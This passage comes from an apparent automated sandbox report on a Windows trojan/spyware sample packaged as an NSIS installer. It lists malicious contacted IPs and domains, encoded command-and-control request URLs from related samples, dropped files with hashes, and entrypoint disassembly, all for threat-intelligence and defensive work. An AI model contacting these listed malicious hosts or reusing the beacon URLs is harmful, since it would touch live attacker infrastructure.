                                https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=help.exe, 00000005.00000003.456470513.00000000003D3000.00000004.00000020.00020000.00000000.sdmp, -ODfqI49.5.drfalse
                                  		high
                                  http://gmpg.org/xfn/11help.exe, 00000005.00000002.569583171.0000000003996000.00000004.10000000.00040000.00000000.sdmpfalse
                                    		high
                                    https://ac.ecosia.org/autocomplete?q=-ODfqI49.5.drfalse
                                      		high
                                      https://search.yahoo.com?fr=crmas_sfphelp.exe, 00000005.00000003.456470513.00000000003D3000.00000004.00000020.00020000.00000000.sdmp, -ODfqI49.5.drfalse
                                        		high
                                        http://nsis.sf.net/NSIS_ErrorLc8xQv8iZY.exefalse
                                          		high
                                          https://hm.baidu.com/hm.js?d0766413c666e394f861185086d7f52fhelp.exe, 00000005.00000002.569839214.0000000004494000.00000004.10000000.00040000.00000000.sdmp, help.exe, 00000005.00000002.568262746.00000000007E0000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://206.119.101.137/ak_Address/Address.jshelp.exe, 00000005.00000002.569839214.0000000004494000.00000004.10000000.00040000.00000000.sdmp, help.exe, 00000005.00000002.568262746.00000000007E0000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=-ODfqI49.5.drfalse
                                              		high
                                              http://code.jquery.com/jquery-3.3.1.min.jshelp.exe, 00000005.00000002.569583171.0000000003996000.00000004.10000000.00040000.00000000.sdmpfalse
                                                		high

                                                World Map of Contacted IPs

                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs

                                                Public IPs

                                                IPDomainCountryFlagASNASN NameMalicious
                                                192.185.217.47
                                                		eufidelizo.comUnited States
                                                		46606UNIFIEDLAYER-AS-1UStrue
                                                206.233.197.135
                                                		www.lyonfinancialusa.comUnited States
                                                		174COGENT-174UStrue
                                                155.159.61.221
                                                		www.patrickguarte.comSouth Africa
                                                		137951CLAYERLIMITED-AS-APClayerLimitedHKtrue
                                                154.22.100.62
                                                		www.foxwhistle.comUnited States
                                                		174COGENT-174UStrue
                                                162.214.129.149
                                                		www.afterdarksocial.clubUnited States
                                                		46606UNIFIEDLAYER-AS-1UStrue
                                                2.57.90.16
                                                		brennancorps.infoLithuania
                                                		47583AS-HOSTINGERLTtrue
                                                192.185.35.86
                                                		lopezmodeling.comUnited States
                                                		46606UNIFIEDLAYER-AS-1UStrue

                                                General Information

                                                Joe Sandbox Version:36.0.0 Rainbow Opal
                                                Analysis ID:756323
                                                Start date and time:2022-11-30 01:23:15 +01:00
                                                Joe Sandbox Product:CloudBasic
                                                Overall analysis duration:0h 9m 42s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Sample file name:Lc8xQv8iZY.exe
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                Number of analysed new started processes analysed:10
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:1
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • HDC enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Detection:MAL
                                                Classification:mal100.troj.spyw.evad.winEXE@7/5@9/7
                                                EGA Information:
                                                • Successful, ratio: 100%
                                                HDC Information:
                                                • Successful, ratio: 78.6% (good quality ratio 73.1%)
                                                • Quality average: 73.2%
                                                • Quality standard deviation: 31.1%
                                                HCA Information:
                                                • Successful, ratio: 100%
                                                • Number of executed functions: 76
                                                • Number of non-executed functions: 96
                                                Cookbook Comments:
                                                • Found application associated with file extension: .exe

                                                Warnings

                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe
                                                • Not all processes where analyzed, report is missing behavior information
                                                • Report creation exceeded maximum time and may have missing disassembly code information.

                                                Simulations

                                                Behavior and APIs

                                                No simulations

                                                Joe Sandbox View / Context

                                                IPs

                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                192.185.217.47qHpeBvr9cR.exeGet hashmaliciousBrowse
                                                • www.eufidelizo.com/henz/?ChMxG4C=wcp3urA+/rGtUuNVdXHur6CaD7Rg4XGXlvUWG7FdGjeYGPzd5j/g1Govvww0i9Uvwfj8E4D4P4OVv2O692MpWFmEiKCsF21Xzw==&8p08qr=2d0X
                                                SecuriteInfo.com.FileRepMalware.16929.9956.exeGet hashmaliciousBrowse
                                                • www.eufidelizo.com/henz/?w4hDa6_P=wcp3urA+/rGtUuNVdXHur6CaD7Rg4XGXlvUWG7FdGjeYGPzd5j/g1Govvww0i9Uvwfj8E4D4P4OVv2O692M0flOUm4qON1Jqzg==&cFQ=V2JLd8UPC
                                                xLd3hdhrqJ.exeGet hashmaliciousBrowse
                                                • www.eufidelizo.com/henz/?vv=UDH8sX&2dKD=wcp3urA+/rGtUuNVdXHur6CaD7Rg4XGXlvUWG7FdGjeYGPzd5j/g1Govvww0i9Uvwfj8E4D4P4OVv2O692MpWFmEiKCsF21Xzw==
                                                inquiry 1811_G_2022.xlsGet hashmaliciousBrowse
                                                • www.eufidelizo.com/henz/?g6=wcp3urA+/rGtUuNVdnH1r+maH4Zk43GXlvUWG7FdGjeYGPzd5j/gkjEzvi43j/MvxviINYayZJCRqW/W9XQVTF/IofufAFE08LFc5gk=&m2J0=0N9LsTr0
                                                hjGin4suRR.exeGet hashmaliciousBrowse
                                                • www.eufidelizo.com/henz/?W0DX=w6tXfJTpFTW&4hrd=wcp3urA+/rGtUuNVdXHur6CaD7Rg4XGXlvUWG7FdGjeYGPzd5j/g1Govvww0i9Uvwfj8E4D4P4OVv2O692M0fnfE5LCOM1Ryzg==
                                                m74vEPIwk5.exeGet hashmaliciousBrowse
                                                • www.eufidelizo.com/henz/?3fH8WXCH=wcp3urA+/rGtUuNVdXHur6CaD7Rg4XGXlvUWG7FdGjeYGPzd5j/g1Govvww0i9Uvwfj8E4D4P4OVv2O692MpWFmEiKCsF21Xzw==&o0Dl3=Rj3HTZzX0DeLSz
                                                P0qK73fPZ4.exeGet hashmaliciousBrowse
                                                • www.eufidelizo.com/henz/?bBZl=_PvXsR6pHXjPkJe&m2JXFV=wcp3urA+/rGtUuNVdXHur6CaD7Rg4XGXlvUWG7FdGjeYGPzd5j/g1Govvww0i9Uvwfj8E4D4P4OVv2O692M0fnfE5LCOM1Ryzg==
                                                TX7yLkC2TS.exeGet hashmaliciousBrowse
                                                • www.eufidelizo.com/henz/?-ZnD=wcp3urA+/rGtUuNVdXHur6CaD7Rg4XGXlvUWG7FdGjeYGPzd5j/g1Govvww0i9Uvwfj8E4D4P4OVv2O692M0fnfE5LCOM1Ryzg==&z2JtHJ=UBt8FTL
                                                hF6Ip5MMDI.exeGet hashmaliciousBrowse
                                                • www.eufidelizo.com/henz/?RDHh1F=wcp3urA+/rGtUuNVdXHur6CaD7Rg4XGXlvUWG7FdGjeYGPzd5j/g1Govvww0i9Uvwfj8E4D4P4OVv2O692M0fnfE5LCOM1Ryzg==&6lsp=B2MDzdbXOTlT
                                                9061630 - JSW ID KAD new order as of 11.015.2022.xlsGet hashmaliciousBrowse
                                                • www.eufidelizo.com/henz/?btxtd0=wcp3urA+/rGtUuNVdnH1r+maH4Zk43GXlvUWG7FdGjeYGPzd5j/gkjEzvi43j/MvxviINYayZJCRqW/W9XQVTF/IofufAFE08LFc5gk=&7nxT-=hruxZn6hQHp
                                                0.General Representative Agreement Sales TO - Project Base.xlsGet hashmaliciousBrowse
                                                • www.eufidelizo.com/henz/?3fodKL=wcp3urA+/rGtUuNVdnH1r+maH4Zk43GXlvUWG7FdGjeYGPzd5j/gkjEzvi43j/MvxviINYayZJCRqW/W9XQVTF/IofufAFE08LFc5gk=&o4=SFQ4vpDH2Hydg
                                                file.exeGet hashmaliciousBrowse
                                                • www.eufidelizo.com/henz/?0Hut_Lox=wcp3urA+/rGtUuNVdXHur6CaD7Rg4XGXlvUWG7FdGjeYGPzd5j/g1Govvww0i9Uvwfj8E4D4P4OVv2O692MpWFmEiKCsF21Xzw==&rVtPIB=VZELH69PZta
                                                Deckles.exeGet hashmaliciousBrowse
                                                • www.eufidelizo.com/um7u/?YXyP=0n3pd2BhJpe0L&XR-tv=RlGM95gtKmWAT9TDK9eV+jU9YQcOVdDyjR3urqCZcyLNJvgg0N3JqRnUrr84y79st1pLk3KSQL7rQAdBjIMn4YAERI7P+DT6Fw==
                                                7ASTu3OkBj.exeGet hashmaliciousBrowse
                                                • www.eufidelizo.com/henz/?IrHDJr=w2JLWvCHczspAV&1bst_NGP=wcp3urA+/rGtUuNVdXHur6CaD7Rg4XGXlvUWG7FdGjeYGPzd5j/g1Govvww0i9Uvwfj8E4D4P4OVv2O692MpWFmEiKCsF21Xzw==
                                                RGkYgSBkAA.exeGet hashmaliciousBrowse
                                                • www.eufidelizo.com/henz/?4hOPTZ=GP_X&5jMl=wcp3urA+/rGtUuNVdXHur6CaD7Rg4XGXlvUWG7FdGjeYGPzd5j/g1Govvww0i9Uvwfj8E4D4P4OVv2O692M0fnfE5LCOM1Ryzg==
                                                fKT7Qe4s7b.exeGet hashmaliciousBrowse
                                                • www.eufidelizo.com/henz/?3fHL=wcp3urA+/rGtUuNVdXHur6CaD7Rg4XGXlvUWG7FdGjeYGPzd5j/g1Govvww0i9Uvwfj8E4D4P4OVv2O692M0fnfE5LCOM1Ryzg==&0pu4=OJBP
                                                Minimal_Stock_Report_11-11-2022-01006.xlsGet hashmaliciousBrowse
                                                • www.eufidelizo.com/henz/?7n-=wcp3urA+/rGtUuNVdnH1r+maH4Zk43GXlvUWG7FdGjeYGPzd5j/gkjEzvi43j/MvxviINYayZJCRqW/W9XQVTF/IofufAFE08LFc5gk=&Y0G=alPl2xE8BlJ
                                                JtUdhdonzo.exeGet hashmaliciousBrowse
                                                • www.eufidelizo.com/henz/?FP=f0DdmxEHuvipVV&MtxPk=wcp3urA+/rGtUuNVdXHur6CaD7Rg4XGXlvUWG7FdGjeYGPzd5j/g1Govvww0i9Uvwfj8E4D4P4OVv2O692M0flOUm4qON1Jqzg==
                                                New order from Georgia RSLINE.xlsGet hashmaliciousBrowse
                                                • www.eufidelizo.com/henz/?HtxDfNyH=wcp3urA+/rGtUuNVdnH1r+maH4Zk43GXlvUWG7FdGjeYGPzd5j/gkjEzvi43j/MvxviINYayZJCRqW/W9XQVTF/IofufAFE08LFc5gk=&5j=czrxUjO8YxP
                                                B8Ex71teF1.exeGet hashmaliciousBrowse
                                                • www.eufidelizo.com/henz/?5jMH=T8kpkdhhtz5L8tT&zX0=wcp3urA+/rGtUuNVdXHur6CaD7Rg4XGXlvUWG7FdGjeYGPzd5j/g1Govvww0i9Uvwfj8E4D4P4OVv2O692M0fnfE5LCOM1Ryzg==

                                                Domains

                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                www.patrickguarte.comqHpeBvr9cR.exeGet hashmaliciousBrowse
                                                • 155.159.61.221
                                                SecuriteInfo.com.FileRepMalware.16929.9956.exeGet hashmaliciousBrowse
                                                • 155.159.61.221
                                                xLd3hdhrqJ.exeGet hashmaliciousBrowse
                                                • 155.159.61.221
                                                m74vEPIwk5.exeGet hashmaliciousBrowse
                                                • 155.159.61.221
                                                TX7yLkC2TS.exeGet hashmaliciousBrowse
                                                • 155.159.61.221
                                                WcA10vw4LK.exeGet hashmaliciousBrowse
                                                • 155.159.61.221
                                                hF6Ip5MMDI.exeGet hashmaliciousBrowse
                                                • 155.159.61.221
                                                file.exeGet hashmaliciousBrowse
                                                • 155.159.61.221
                                                7ASTu3OkBj.exeGet hashmaliciousBrowse
                                                • 155.159.61.221
                                                RGkYgSBkAA.exeGet hashmaliciousBrowse
                                                • 155.159.61.221
                                                jYcGmTRl98.exeGet hashmaliciousBrowse
                                                • 155.159.61.221
                                                fKT7Qe4s7b.exeGet hashmaliciousBrowse
                                                • 155.159.61.221
                                                JtUdhdonzo.exeGet hashmaliciousBrowse
                                                • 155.159.61.221
                                                DHL-Express.exeGet hashmaliciousBrowse
                                                • 155.159.61.221
                                                B8Ex71teF1.exeGet hashmaliciousBrowse
                                                • 155.159.61.221
                                                file.exeGet hashmaliciousBrowse
                                                • 155.159.61.221
                                                Purchase Order.exeGet hashmaliciousBrowse
                                                • 155.159.61.221

                                                ASNs

                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                COGENT-174USqHpeBvr9cR.exeGet hashmaliciousBrowse
                                                • 206.233.197.135
                                                November Draw Disbursed.htmlGet hashmaliciousBrowse
                                                • 38.34.185.163
                                                November Draw Disbursed.htmlGet hashmaliciousBrowse
                                                • 38.34.185.163
                                                Order #RR00-927361823.imgGet hashmaliciousBrowse
                                                • 154.53.55.72
                                                NHYGUnNN.exeGet hashmaliciousBrowse
                                                • 38.55.236.89
                                                robinbotGet hashmaliciousBrowse
                                                • 38.136.33.70
                                                robinbotGet hashmaliciousBrowse
                                                • 38.136.33.70
                                                New PO-RJ-IN-003 - Knauf Queimados.exeGet hashmaliciousBrowse
                                                • 38.163.214.169
                                                Ziraat Bankasi Swift Mesaji20221129-34221.exeGet hashmaliciousBrowse
                                                • 38.239.92.131
                                                Ziraat Bankasi Swift Mesaji20221129-34221.exeGet hashmaliciousBrowse
                                                • 38.239.92.131
                                                KL7955.imgGet hashmaliciousBrowse
                                                • 206.1.131.23
                                                GyKpRhKQY1.elfGet hashmaliciousBrowse
                                                • 38.211.154.4
                                                kTK22xqEq6.elfGet hashmaliciousBrowse
                                                • 204.7.115.146
                                                7HuJu44thW.elfGet hashmaliciousBrowse
                                                • 38.15.202.230
                                                8kH56VSq58.elfGet hashmaliciousBrowse
                                                • 38.140.31.193
                                                mail.us-0LF8-YHCG0N-MBA4-Centor-mail.us-0LF8-YHCG0N-MBA4-Centor-mail.us-0LF8-YHCG0N-MBA4.htmlGet hashmaliciousBrowse
                                                • 38.34.185.163
                                                SecuriteInfo.com.FileRepMalware.16929.9956.exeGet hashmaliciousBrowse
                                                • 206.233.197.135
                                                sora.arm.elfGet hashmaliciousBrowse
                                                • 140.242.24.234
                                                file.exeGet hashmaliciousBrowse
                                                • 38.239.46.206
                                                Yw0HhtLWAz.elfGet hashmaliciousBrowse
                                                • 149.113.236.91
                                                UNIFIEDLAYER-AS-1USqHpeBvr9cR.exeGet hashmaliciousBrowse
                                                • 162.214.129.149
                                                Markelcorp Pay Application November 29, 2022_11725512247820161423.htmlGet hashmaliciousBrowse
                                                • 192.185.196.50
                                                Markelcorp Pay-Application Completed November 29, 2022_48707712230774110046.htmlGet hashmaliciousBrowse
                                                • 192.185.196.50
                                                https://b6dj2ueylkg.juraganrc.com/?url=aHR0cHM6Ly9ob2xseS1sYXZlbmRlci1yYXR0bGVzbmFrZS5nbGl0Y2gubWUvdmlsZC5odG1sGet hashmaliciousBrowse
                                                • 192.185.138.191
                                                SIEM_PO00938467648.vbsGet hashmaliciousBrowse
                                                • 162.240.62.179
                                                Revised Policy Benefits.htmlGet hashmaliciousBrowse
                                                • 192.185.196.49
                                                Revised Policy Benefits.htmlGet hashmaliciousBrowse
                                                • 192.185.196.49
                                                New_Financia1_Report.htmGet hashmaliciousBrowse
                                                • 69.49.234.179
                                                New_Financia1_Report.htmGet hashmaliciousBrowse
                                                • 69.49.234.179
                                                Policy handbook.htmlGet hashmaliciousBrowse
                                                • 50.87.153.144
                                                New PO-RJ-IN-003 - Knauf Queimados.exeGet hashmaliciousBrowse
                                                • 192.185.90.105
                                                SHIPPING DOC.exeGet hashmaliciousBrowse
                                                • 50.87.139.143
                                                Cg7vRuVKhI.exeGet hashmaliciousBrowse
                                                • 108.167.141.123
                                                policy handbooks.htmlGet hashmaliciousBrowse
                                                • 50.87.153.144
                                                https://u29751933.ct.sendgrid.net/ls/click?upn=CnGGOnFaxhvhWvH4Fu0DshuMMwznLhhSl0vF9VJfmXn4k3uWmXtWEXgU1gN1sOYDM-2FnTKBAYRDOo-2Fxp1e29eFw-3D-3D1SY9_-2FHydVa-2F6RgJ-2BO01uO1tSzf4k9wftL50WVzxI-2BDuM83WY91mlfH2j-2BdduOmIaC9RL57-2F4cZ8bwv5R6qDViDOPW8H7XI4v762lTVPjiQ2n2fiTT0EsPoTwZUC1VOPK6BOuruRTtU-2FIclxgJ3qp4zIBngkcg1uQEKF68oozcL-2BfK4GoB5e-2BnOh4XhI8nLZlju2lQTsa8dPRVDT7dRrjRlibaPNNXjuJ6PKaJjbMu-2Bzfm-2F8-3DGet hashmaliciousBrowse
                                                • 50.87.144.212
                                                http://nbtp3.commentlikeordislike.com/aHR0cHM6Ly9mb3Vyc3RhcmFsYW4uY29tL3N1Y2Nlc3MvZ28vZ2FicmllbGEubWFydGluQHNreWFpcmxpbmUuY29tGet hashmaliciousBrowse
                                                • 69.49.229.176
                                                SecuriteInfo.com.FileRepMalware.16929.9956.exeGet hashmaliciousBrowse
                                                • 162.214.129.149
                                                Revised Policy Benefits.htmlGet hashmaliciousBrowse
                                                • 192.185.196.49
                                                Confirmation transfer Copy AGS # 22-0035.xlsGet hashmaliciousBrowse
                                                • 69.49.245.57
                                                PO-09784893 xlsx.vbsGet hashmaliciousBrowse
                                                • 192.185.145.188

                                                JA3 Fingerprints

                                                No context

                                                Dropped Files

                                                No context

                                                Created / dropped Files

                                                C:\Users\user\AppData\Local\Temp\-ODfqI49

                                                Download File
                                                Process:C:\Windows\SysWOW64\help.exe
                                                File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 3, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 3
                                                Category:dropped
                                                Size (bytes):94208
                                                Entropy (8bit):1.2880737026424216
                                                Encrypted:false
                                                SSDEEP:192:Qo1/8dpUXbSzTPJPQ6YVucbj8Ewn7PrH944:QS/inojVucbj8Ewn7b944
                                                MD5:5F02C426BCF0D3E3DC81F002F9125663
                                                SHA1:EA50920666E30250E4BE05194FA7B3F44967BE94
                                                SHA-256:DF93CD763CFEC79473D0DCF58C77D45C99D246CE347652BF215A97D8D1267EFA
                                                SHA-512:53EFE8F752484B48C39E1ABFBA05840FF2B968DE2BCAE16287877F69BABE8C54617E76C6953A22789043E27C9CCA9DB4FED5D2C2A512CBDDB5015F4CAB57C198
                                                Malicious:false
                                                Reputation:moderate, very likely benign file
                                                Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                C:\Users\user\AppData\Local\Temp\hvbvmxm.exe

                                                Download File
                                                Process:C:\Users\user\Desktop\Lc8xQv8iZY.exe
                                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                Category:dropped
                                                Size (bytes):125952
                                                Entropy (8bit):6.271337362250939
                                                Encrypted:false
                                                SSDEEP:3072:hzNyHSqEF90sCFO/M7f9hUnBZFXBuioTLzJhiF:mHSqo9jE5hSFXEc
                                                MD5:1EEBBBD92B2C0C60F896FF8DCBCEDCAA
                                                SHA1:1291CC58A5664B1ACD50D9FD8E0580C519190477
                                                SHA-256:01B2D4443C383F07CCF3EA521AE9502527EEEDF352B92B90A382121B03992EC3
                                                SHA-512:67EFA564F026094BEC0A44AAF01FC8072412E6CDEFF019631689254A996C8B06CD0CCCCEE64B3D70B847E9ACA7C3DBCDE327D0A822988CC5295847990A8D9215
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                • Antivirus: ReversingLabs, Detection: 54%
                                                Reputation:low
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........\..............................2......2......2................v..*......*.t....*......Rich...........PE..L......c.................h........................@..........................@.......................................................0.............................. ...............................@...@............................................text....f.......h.................. ..`.rdata...k.......l...l..............@..@.data...(+..........................@....gfids....... ......................@..@.rsrc........0......................@..@................................................................................................................................................................................................................................................................................................................

                                                C:\Users\user\AppData\Local\Temp\ijamguwvje.h

                                                Download File
                                                Process:C:\Users\user\Desktop\Lc8xQv8iZY.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):5929
                                                Entropy (8bit):6.194305098271039
                                                Encrypted:false
                                                SSDEEP:96:l3ZCWD/FmJYgnXC7p7i7Q7+7J7Q737snGaMyyhcLofV1M+zzinQTDLEyoscdwQU4:7/FmJYIydOs6dcDqVycLoN1M+eAjoscb
                                                MD5:00815375B1B0AEF8D5F1C54050813CF2
                                                SHA1:E007F2C7D30FBD16A35A97E91B1B4719F46D28BB
                                                SHA-256:2C6C3495127AE142AAA4577D73B6C1EE3502B2C76BEE20EBF54CEA2C86404E63
                                                SHA-512:64EDF14579C02EBE2B27EA06A19C5753F08AEEA370E4C8BF93552086AA4FFB62EBF841E818D40CA091343BB789AD7F42A7FE2BFBB76FE870F19065A31AAE2FE2
                                                Malicious:false
                                                Reputation:low
                                                Preview:.....}......i..i....i..L..}.....WV.i..!..6..Q........K..Z6......g...T.].L..W.Q....V.O.....gJ.....N._.....T.].L..X}......i..i....i.q&..Y.......$d5Xk...6A...5.....L....QW.9...L....V..........Og".,..T.L..XXRWV.Q.7.f...a!...Y..........>.i....L5.d...Q....]s..Y...Z.....L5gZ.Q.......Q....Nv]..]"....L..XXRWV}......i..i....i.q....Y....Q.AV.T......9..Z9.k"|5.V............Nv.aNv...k..2$..".Nv...GZ.$..k.Nf.$g..Nv.GZ...Nf.GZ...Q.T5".b.QV.T5.L.ZA..........i.....Q.L..W.Q....V......$..J.....Nv_......T.].L..(......1....$.1......Z.............."|A."|..kn.G...kB.G../kn.G..ykp.G..skD.G..mk..G..wkD.G...k..G...kk.G..uk..G...k|.G...k..G.....G....d4.....qG............q.............q..t.....54.....q..m......4.....qi........4.....qW........4.....q/.......u4....=q!........4....%..ij...\9N..i....\9...i....\9...ij...\9g..i....\9h$.A..."|.....i..."..\.......k..68...N.]..d.Nwe.9.....e\9...ij.Nw.\..hj..Nwe.9Z.G..i..Nw.\..h..Nwe.9Z.e..i..N

                                                C:\Users\user\AppData\Local\Temp\nsaAF5F.tmp

                                                Download File
                                                Process:C:\Users\user\Desktop\Lc8xQv8iZY.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):329129
                                                Entropy (8bit):7.534660167276675
                                                Encrypted:false
                                                SSDEEP:6144:qOlZjKGnyqAVoJZmaEPokM0R/fyysHSqo9jE5hSFXEc:lZjLA2ZJYJGf+E5h
                                                MD5:0092575B985AE1E77D23EC215EE09C05
                                                SHA1:122945BC6AC3866DDF76ECF99127D9648F5024A6
                                                SHA-256:27BE4D2BA04D732C15B4916F2758D13928D2D31377228E575B61D8DA7A509CBD
                                                SHA-512:C0F19441D03AC8F95C38F5878B4B61C01BCB852CFABCBF26A9D793B74D6D731AC9FD78D1317E2EC90A439E0368FE869E6A660C5DD34D0950A7CC6843F6FBFE10
                                                Malicious:false
                                                Reputation:low
                                                Preview:p.......,...................W...x...............p...........................................................................................................................................................................................................................................J..............."...j...............................................................................................................................h.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                C:\Users\user\AppData\Local\Temp\ocoimqmpj.ep

                                                Download File
                                                Process:C:\Users\user\Desktop\Lc8xQv8iZY.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):189440
                                                Entropy (8bit):7.99864599001922
                                                Encrypted:true
                                                SSDEEP:3072:plkkjPCMjKvjM3CqAVPQsKZCVbJ55QSX5HBmGwrVhQles+ALw0J/ECp:plZjKGnyqAVoJZmaEPokM0R/p
                                                MD5:ADD9CD4EACD9591A07875B761C8D1640
                                                SHA1:2047C17A31A7E83850DEF3CA6310572957E5D0B2
                                                SHA-256:0AF1AFDA6F616BEB76513577272E0E36EFB99CF8A3718B7725D60C9D88DFBC0B
                                                SHA-512:132281DC01506D09D5C7106105338179A9DB0D50309C94FFBC5E63A7FBF0E6D6DC5B31D26DB93E51FB4C994DA3F8D9B398D2C31F3CF8CF807F111BD9CCF761AC
                                                Malicious:false
                                                Preview:.y..V?......a.v.Nrd....y..8..z....&.t.H...d.F..._..,(...&.....<.1.S..Z......W..5fn]8.....F.......B..+.6.......iw%.G$.....2Y........6..7....v...K.n.7AA.;PY..&cIMd..0..>.$~_p.....)..t.:.x1..r.w.7s....y)..B..6.vf.H..d..;..%....T.o.2....Cl....t.V?..J.i.....=d.)d..e?^..$R...&.t.H"..G.F.....,(..v&.....T.'.XZ)W..1D.7B..c.u...Y.#..j.......D.4...\..[...#%.G$...........*.....(.......(.>R..<tz..DH..7..a...E 0..>.$~_.q.+...)j..t(.c..`\*rXw.7s..N...!..B..WS.vf.H..d!..;..%..<.T.C.2.....l....t.V?..J.i.....Fd..d..e?^..z....&.t.H...d.F..._..,(..v&.....T.'.XZ)W..1D.7B..c.u...Y.#..j.......D.4...\..[...#%.G$...........*.....(.......(.>R..<tz..DH..7..a...E 0..>.$~_p.....)...t(}c...*r.w.7s..N...!..B.W.vf.H..d!..;..%..<.T.C.2.....l....t.V?..J.i.....Fd..d..e?^..z....&.t.H...d.F..._..,(..v&.....T.'.XZ)W..1D.7B..c.u...Y.#..j.......D.4...\..[...#%.G$...........*.....(.......(.>R..<tz..DH..7..a...E 0..>.$~_p.....)...t(}c...*r.w.7s..N...!..B.W.vf.H..d

                                                Static File Info

                                                General

                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                Entropy (8bit):7.934197714132832
                                                TrID:
                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                • DOS Executable Generic (2002/1) 0.02%
                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                File name:Lc8xQv8iZY.exe
                                                File size:278807
                                                MD5:30571d64c9a9ed267159fa941a20840c
                                                SHA1:bfb81d8a7c94781b3bd939bd17d500ae61b2ff70
                                                SHA256:85d6c9eac93fb8818d37dc15110ebd060b3e9df48043ee6bcf349df6aed047c5
                                                SHA512:5c8b708f3540b9347c36722934c8fc56098a94f8362688a8fa712da99e1b8c2564698eb0bed52e226cdfc40cf8b762e1860f6ea9928260e3f0f35bba9cfda82f
                                                SSDEEP:6144:QBn10/UR088uiPuDtJWn42Isu/20+kfAZLrYdwMPTnDMiQH7oPo9:gWLuiPh4rZOH5ZL/MLn4REo9
                                                TLSH:4854236595E0DCF3E6EF5E70AAAB87E6E3B3B0444525D9CAC3608D2F68211C58E1D142
                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........3(..RF..RF..RF.*]...RF..RG.pRF.*]...RF..qv..RF..T@..RF.Rich.RF.........................PE..L...ly.V.................^.........

                                                File Icon

                                                Icon Hash:b2a88c96b2ca6a72

                                                Static PE Info

                                                General

                                                Entrypoint:0x40324f
                                                Entrypoint Section:.text
                                                Digitally signed:false
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                DLL Characteristics:TERMINAL_SERVER_AWARE
                                                Time Stamp:0x567F796C [Sun Dec 27 05:38:52 2015 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:4
                                                OS Version Minor:0
                                                File Version Major:4
                                                File Version Minor:0
                                                Subsystem Version Major:4
                                                Subsystem Version Minor:0
                                                Import Hash:ab6770b0a8635b9d92a5838920cfe770

                                                Entrypoint Preview

                                                Instruction
                                                sub esp, 00000180h
                                                push ebx
                                                push ebp
                                                push esi
                                                push edi
                                                xor ebx, ebx
                                                push 00008001h
                                                mov dword ptr [esp+1Ch], ebx
                                                mov dword ptr [esp+14h], 00409130h
                                                xor esi, esi
                                                mov byte ptr [esp+18h], 00000020h
                                                call dword ptr [004070B8h]
                                                call dword ptr [004070B4h]
                                                cmp ax, 00000006h
                                                je 00007F51E0A2E4F3h
                                                push ebx
                                                call 00007F51E0A312E1h
                                                cmp eax, ebx
                                                je 00007F51E0A2E4E9h
                                                push 00000C00h
                                                call eax
                                                push 004091E0h
                                                call 00007F51E0A31262h
                                                push 004091D8h
                                                call 00007F51E0A31258h
                                                push 004091CCh
                                                call 00007F51E0A3124Eh
                                                push 0000000Dh
                                                call 00007F51E0A312B1h
                                                push 0000000Bh
                                                call 00007F51E0A312AAh
                                                mov dword ptr [00423F84h], eax
                                                call dword ptr [00407034h]
                                                push ebx
                                                call dword ptr [00407270h]
                                                mov dword ptr [00424038h], eax
                                                push ebx
                                                lea eax, dword ptr [esp+34h]
                                                push 00000160h
                                                push eax
                                                push ebx
                                                push 0041F538h
                                                call dword ptr [00407160h]
                                                push 004091C0h
                                                push 00423780h
                                                call 00007F51E0A30EE1h
                                                call dword ptr [004070B0h]
                                                mov ebp, 0042A000h
                                                push eax
                                                push ebp
                                                call 00007F51E0A30ECFh
                                                push ebx
                                                call dword ptr [00407144h]

                                                Rich Headers

                                                Programming Language:
                                                • [EXP] VC++ 6.0 SP5 build 8804

                                                Data Directories

                                                NameVirtual AddressVirtual Size Is in Section
                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x73cc0xa0.rdata
                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x2d0000x9e0.rsrc
                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
